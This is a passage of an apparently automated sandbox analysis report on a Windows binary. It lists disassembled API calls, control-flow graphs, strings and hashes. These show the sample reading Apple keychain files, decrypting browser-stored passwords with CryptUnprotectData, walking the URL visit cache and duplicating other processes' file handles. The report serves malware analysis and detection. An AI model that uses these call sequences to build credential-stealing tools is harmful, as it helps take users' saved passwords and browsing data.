                                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                                    • API String ID: 1963886904-3798722523
                                                                                                                                                                                                                                    • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                                                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                                                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                                    • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                                                                                                                                                    • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                                                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                                                                                                    • API String ID: 2744995895-28296030
                                                                                                                                                                                                                                    • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                                                                                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                                                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                    • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B851
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                                                                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                      • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BB53
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateCryptDataDeleteHandleLibraryLocalProcUnprotectmemcmpmemcpywcscpy
                                                                                                                                                                                                                                    • String ID: chp$v10
                                                                                                                                                                                                                                    • API String ID: 1297422669-2783969131
                                                                                                                                                                                                                                    • Opcode ID: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                                                                                                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 504 40e2ab-40e2d5 call 40695d call 406b90 509 40e4a0-40e4af call 4069a3 504->509 510 40e2db-40e300 504->510 511 40e304-40e30f call 406e8f 510->511 515 40e314-40e316 511->515 516 40e476-40e483 call 406b53 515->516 517 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 515->517 523 40e302 516->523 524 40e489-40e495 call 40aa04 516->524 541 40e3c9-40e3ce 517->541 542 40e39d-40e3ae call 40742e 517->542 523->511 524->509 529 40e497-40e49f free 524->529 529->509 544 40e3d0-40e3d6 541->544 545 40e3d9-40e3de 541->545 551 40e3b0 542->551 552 40e3b3-40e3c1 wcschr 542->552 544->545 547 40e3e0-40e3f1 memcpy 545->547 548 40e3f4-40e3f9 545->548 547->548 549 40e3fb-40e40c memcpy 548->549 550 40e40f-40e414 548->550 549->550 553 40e416-40e427 memcpy 550->553 554 40e42a-40e42f 550->554 551->552 552->541 555 40e3c3-40e3c6 552->555 553->554 556 40e431-40e442 memcpy 554->556 557 40e445-40e44a 554->557 555->541 556->557 558 40e44c-40e45b 557->558 559 40e45e-40e463 557->559 558->559 559->516 560 40e465-40e469 559->560 560->516 561 40e46b-40e473 560->561 561->516
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                    • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75C52EE0), ref: 0040E3EC
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75C52EE0), ref: 0040E407
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75C52EE0), ref: 0040E422
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,75C52EE0), ref: 0040E43D
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                                                    • API String ID: 3849927982-2252543386
                                                                                                                                                                                                                                    • Opcode ID: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e36793f9e080becf73b9dda80bc1391f7a6b1e793b4af3828a127e2c1810b15
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 562 4091b8-40921b memset call 40a6e6 call 444432 567 409520-409526 562->567 568 409221-40923b call 40b273 call 438552 562->568 572 409240-409248 568->572 573 409383-4093ab call 40b273 call 438552 572->573 574 40924e-409258 call 4251c4 572->574 586 4093b1 573->586 587 4094ff-40950b call 443d90 573->587 579 40937b-40937e call 424f26 574->579 580 40925e-409291 call 4253cf * 2 call 4253af * 2 574->580 579->573 580->579 610 409297-409299 580->610 590 4093d3-4093dd call 4251c4 586->590 587->567 596 40950d-409511 587->596 597 4093b3-4093cc call 4253cf * 2 590->597 598 4093df 590->598 596->567 600 409513-40951d call 408f2f 596->600 597->590 613 4093ce-4093d1 597->613 602 4094f7-4094fa call 424f26 598->602 600->567 602->587 610->579 612 40929f-4092a3 610->612 612->579 614 4092a9-4092ba 612->614 613->590 617 4093e4-4093fb call 4253af * 2 613->617 615 4092bc 614->615 616 4092be-4092e3 memcpy memcmp 614->616 615->616 618 409333-409345 memcmp 616->618 619 4092e5-4092ec 616->619 617->602 627 409401-409403 617->627 618->579 622 409347-40935f memcpy 618->622 619->579 621 4092f2-409331 memcpy * 2 619->621 624 409363-409378 memcpy 621->624 622->624 624->579 627->602 628 409409-40941b memcmp 627->628 628->602 629 409421-409433 memcmp 628->629 630 4094a4-4094b6 memcmp 629->630 631 409435-40943c 629->631 630->602 633 4094b8-4094ed memcpy * 2 630->633 631->602 632 409442-4094a2 memcpy * 3 631->632 634 4094f4 632->634 633->634 634->602
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                                                    • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                                                    • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3715365532-3916222277
                                                                                                                                                                                                                                    • Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                                                                                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                                    • String ID: bhv
                                                                                                                                                                                                                                    • API String ID: 4234240956-2689659898
                                                                                                                                                                                                                                    • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                                                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                    • API String ID: 2941347001-70141382
                                                                                                                                                                                                                                    • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                                                                    • String ID: visited:
                                                                                                                                                                                                                                    • API String ID: 2470578098-1702587658
                                                                                                                                                                                                                                    • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                                                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
